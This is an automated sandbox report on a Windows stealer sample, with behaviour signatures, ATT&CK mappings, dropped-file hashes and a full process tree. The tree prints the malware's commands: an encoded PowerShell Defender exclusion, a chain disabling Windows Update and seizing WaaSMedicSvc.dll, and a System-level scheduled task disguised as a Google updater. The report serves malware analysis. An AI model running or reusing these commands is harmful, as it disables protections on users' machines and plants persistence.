e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba

Analysis

max time kernel
150s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
04-05-2022 12:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe
Size

185KB
MD5

c795181ec19574853c944ce0858bdbaa
SHA1

9644d104cb05a61904c28238c6bdbee56b5acb56
SHA256

e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba
SHA512

84f1b604374e7391d29c1df67097f5f14724e9c6b10dca95a65397f51feaa20f0b3420ea6a47c85d85df6a12a048aab0b195899aed2cd73bc1f854c3688f3275

Score

10^/10

discovery evasion exploit spyware stealer suricata

Malware Config

Signatures

suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

743112.exeupdater.exe

pid process

4548 743112.exe
1156 updater.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

3716 takeown.exe
5048 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4548	743112.exe
1156	updater.exe

pid	process
3716	takeown.exe
5048	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe

Loads dropped DLL 7 IoCs

Processes:

e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe

pid	process
2348	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe
2348	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe
2348	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe
2348	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe
2348	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe
2348	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe
2348	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

3716 takeown.exe
5048 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

14 freegeoip.app
15 freegeoip.app
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
3716	takeown.exe
5048	icacls.exe

flow	ioc
14	freegeoip.app
15	freegeoip.app

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1688 schtasks.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.execonhost.exe

pid process

4000 powershell.exe
4000 powershell.exe
2784 conhost.exe

pid	process
1688	schtasks.exe

pid	process
4000	powershell.exe
4000	powershell.exe
2784	conhost.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	2348	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeDebugPrivilege	2784	conhost.exe
Token: SeShutdownPrivilege	3556	powercfg.exe
Token: SeCreatePagefilePrivilege	3556	powercfg.exe
Token: SeShutdownPrivilege	3104	powercfg.exe
Token: SeCreatePagefilePrivilege	3104	powercfg.exe
Token: SeShutdownPrivilege	2996	powercfg.exe
Token: SeCreatePagefilePrivilege	2996	powercfg.exe
Token: SeShutdownPrivilege	1044	powercfg.exe
Token: SeCreatePagefilePrivilege	1044	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe743112.execonhost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2348 wrote to memory of 4548	2348	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe	743112.exe
PID 2348 wrote to memory of 4548	2348	e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe	743112.exe
PID 4548 wrote to memory of 2784	4548	743112.exe	conhost.exe
PID 4548 wrote to memory of 2784	4548	743112.exe	conhost.exe
PID 4548 wrote to memory of 2784	4548	743112.exe	conhost.exe
PID 2784 wrote to memory of 720	2784	conhost.exe	cmd.exe
PID 2784 wrote to memory of 720	2784	conhost.exe	cmd.exe
PID 720 wrote to memory of 4000	720	cmd.exe	powershell.exe
PID 720 wrote to memory of 4000	720	cmd.exe	powershell.exe
PID 2784 wrote to memory of 2888	2784	conhost.exe	cmd.exe
PID 2784 wrote to memory of 2888	2784	conhost.exe	cmd.exe
PID 2784 wrote to memory of 2744	2784	conhost.exe	cmd.exe
PID 2784 wrote to memory of 2744	2784	conhost.exe	cmd.exe
PID 2888 wrote to memory of 2360	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 2360	2888	cmd.exe	sc.exe
PID 2744 wrote to memory of 3556	2744	cmd.exe	powercfg.exe
PID 2744 wrote to memory of 3556	2744	cmd.exe	powercfg.exe
PID 2888 wrote to memory of 4948	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 4948	2888	cmd.exe	sc.exe
PID 2744 wrote to memory of 3104	2744	cmd.exe	powercfg.exe
PID 2744 wrote to memory of 3104	2744	cmd.exe	powercfg.exe
PID 2888 wrote to memory of 1152	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 1152	2888	cmd.exe	sc.exe
PID 2744 wrote to memory of 2996	2744	cmd.exe	powercfg.exe
PID 2744 wrote to memory of 2996	2744	cmd.exe	powercfg.exe
PID 2888 wrote to memory of 2188	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 2188	2888	cmd.exe	sc.exe
PID 2744 wrote to memory of 1044	2744	cmd.exe	powercfg.exe
PID 2744 wrote to memory of 1044	2744	cmd.exe	powercfg.exe
PID 2888 wrote to memory of 4176	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 4176	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 3868	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 3868	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 1420	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 1420	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 4876	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 4876	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 1048	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 1048	2888	cmd.exe	sc.exe
PID 2784 wrote to memory of 2640	2784	conhost.exe	cmd.exe
PID 2784 wrote to memory of 2640	2784	conhost.exe	cmd.exe
PID 2888 wrote to memory of 3884	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 3884	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 792	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 792	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 2400	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 2400	2888	cmd.exe	sc.exe
PID 2640 wrote to memory of 1688	2640	cmd.exe	schtasks.exe
PID 2640 wrote to memory of 1688	2640	cmd.exe	schtasks.exe
PID 2888 wrote to memory of 2656	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 2656	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 2392	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 2392	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 1004	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 1004	2888	cmd.exe	sc.exe
PID 2888 wrote to memory of 3716	2888	cmd.exe	takeown.exe
PID 2888 wrote to memory of 3716	2888	cmd.exe	takeown.exe
PID 2888 wrote to memory of 5048	2888	cmd.exe	icacls.exe
PID 2888 wrote to memory of 5048	2888	cmd.exe	icacls.exe
PID 2888 wrote to memory of 4316	2888	cmd.exe	reg.exe
PID 2888 wrote to memory of 4316	2888	cmd.exe	reg.exe
PID 2888 wrote to memory of 4064	2888	cmd.exe	reg.exe
PID 2888 wrote to memory of 4064	2888	cmd.exe	reg.exe
PID 2888 wrote to memory of 1976	2888	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe
"C:\Users\Admin\AppData\Local\Temp\e0f57576c19411ad3311dc207af97abfc40138cbf014a090da01bd3a2a5463ba.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2348

C:\Users\Admin\AppData\Local\743112.exe
"C:\Users\Admin\AppData\Local\743112.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4548

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\743112.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
4⤵
- Suspicious use of WriteProcessMemory
PID:720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3104

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3556

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1044

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:2888

C:\Windows\system32\sc.exe
sc stop bits
5⤵
PID:4948

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
PID:2360

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
PID:2188

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
PID:1152

C:\Windows\system32\sc.exe
sc config bits start= disabled
5⤵
PID:4876

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
5⤵
PID:1420

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
5⤵
PID:3884

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
5⤵
PID:1048

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
5⤵
PID:3868

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
5⤵
PID:2392

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
5⤵
PID:2656

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
5⤵
PID:1004

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
5⤵
PID:2400

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
5⤵
PID:792

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
PID:4176

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3716

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5048

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
5⤵
PID:4316

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
5⤵
PID:4064

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
PID:1976

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
PID:1584

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
PID:2352

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
PID:2300

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
5⤵
PID:2008

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
5⤵
PID:312

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
5⤵
PID:2492

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
5⤵
PID:2968

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
5⤵
PID:1760

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:4716

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:4532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2640

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
5⤵
- Creates scheduled task(s)
PID:1688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
4⤵
PID:2284

C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
5⤵
- Executes dropped EXE
PID:1156

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
6⤵
PID:1488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
7⤵
PID:1724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
8⤵
PID:4920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:4576

C:\Windows\system32\sc.exe
sc stop wuauserv
8⤵
PID:5024

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
8⤵
PID:748

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
8⤵
PID:1480

C:\Windows\system32\sc.exe
sc stop UsoSvc
8⤵
PID:620

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
8⤵
PID:828

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
8⤵
PID:2944

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
8⤵
PID:1052

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
8⤵
PID:4892

C:\Windows\system32\sc.exe
sc config bits start= disabled
8⤵
PID:1568

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
8⤵
PID:3680

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
8⤵
PID:4664

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
8⤵
PID:1260

C:\Windows\explorer.exe
C:\Windows\explorer.exe clcmeewnjgen0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPBwfs6hsH6BZWYzKcgqh8/w5KES9i8iVGoln9YNKyIMIhchOv/qhVSSEyQVeeilGRs3EMCL7VVGCZZSNmGX+WhFkG6w6YtPhSONt0KQQX8lWBvZt8FTQet3u0ld4bcUsTw5fhWYnAMLoF2LOPPGYB2TrjMWdV62jpwHJofDnqBDBuWFMcEnGAyC28ts80L6HbzDjD0sBquAT4Mewl/rkK/eevnCIDRRDM/KANXpzBDbtzl320IoXjIb++yELBFh84SFIEF7L1qVd4YMHKeZwe807fKfwUBxVnRO7THuzKbYajHeg/I3SfaR6UzIZjCjwxfhgN5uZ2YUVYF2II6O4qeOY3s8Ab9cm7XC77uCy/Na4z1O1SfjGZbw/cD9kQ+XXgNvtDG6BognpyTqDH6/Yd56nhRN7gcoUiQQ2GwpUmVPUtKsvTrf3487LBbzei+Xrzzg==
7⤵
PID:1172

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
PID:1752

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\743112.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Local\743112.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
443B

MD5
8add56521ef894ef0c66ecd3e989d718

SHA1
2058aa5185fd5dcce7263bef8fe35bf5e12dbc7f

SHA256
01bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724

SHA512
af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
